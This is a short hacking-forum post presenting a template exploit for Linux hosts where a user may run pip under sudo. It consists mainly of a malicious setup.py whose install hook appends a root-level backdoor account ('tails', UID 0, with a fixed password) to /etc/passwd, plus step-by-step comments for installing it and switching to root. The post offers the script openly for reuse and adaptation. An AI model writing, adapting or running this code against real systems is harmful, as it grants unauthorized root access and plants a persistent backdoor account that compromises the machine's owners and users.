Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Quick Write-Up: Pip-Boy
#1
Every get a foothold on system that allows a user to run Python pip as sudo?
Here's a script template to perform actions. Use it and modify it to your needs.. Smile

Code:
#!/usr/bin/python
#Rename to setup.py before use
#Run: sudo /usr/bin/pip install . --upgrade --force-reinstall
#Get root shell: su tails
#password is screaming-goats
from setuptools import setup
from setuptools.command.install import install
import os

class CustomInstall(install):
    def run(self):
        install.run(self)
        os.system('echo tails:/UeS4ThUJ6N8s:0:0:root:/root:/bin/bash >> /etc/passwd')

setup(name='tailspip',
      version='1.1.1',
      description='This will exploit a sudoer able to run /usr/bin/pip as root',
      url='https://lmgtfy.com/',
      author='tails',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install':CustomInstall})
Give me 9 hours to chop down a tree. I'll spend 8 hours sharpening my axe. - Tails

#gollama member
Reply


Forum Jump: